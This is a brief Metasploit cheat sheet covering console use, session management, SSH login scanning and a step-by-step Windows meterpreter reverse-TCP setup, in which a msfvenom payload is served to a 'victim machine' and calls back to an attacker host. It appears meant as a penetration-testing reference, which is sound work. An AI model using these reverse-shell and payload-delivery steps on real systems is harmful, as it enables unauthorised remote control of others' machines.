Metasploit Cheatsheet

Essential Metasploit commands for shells, sessions, and exploits

Starting the Metasploit console

msfconsole

Gain shell on system when in meterpreter session

shell

Reverse TCP session

  1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=$attackerIp LPORT=$listenPort -f exe -o /home/kali/Desktop/rs_exploit.exe
  2. use exploit/multi/handler
  3. set PAYLOAD windows/meterpreter/reverse_tcp
  4. set LHOST $attackerIp
  5. set LPORT $listenPort
  6. exploit
  7. Start a Python HTTP server to copy the payload to the victim: sudo python3 -m http.server 8080
  8. Download the file on the victim machine by visiting $attackerIp:8080 in a browser.
  9. Run rs_exploit.exe on the victim machine.

SSH as session

  1. use auxiliary/scanner/ssh/ssh_login
  2. set rhosts $destIP
  3. set username $username
  4. set password $password
  5. exploit

Managing sessions

  • Background session: bg
  • List sessions: sessions -l
  • Enter session: sessions -i $sessionNumber
  • Rename session: sessions -n $sessionName -i $sessionNumber

Using exploits

  • Search exploit: search $searchString
  • Use exploit:
    • use path/to/exploit
    • show options
    • set session 1
    • exploit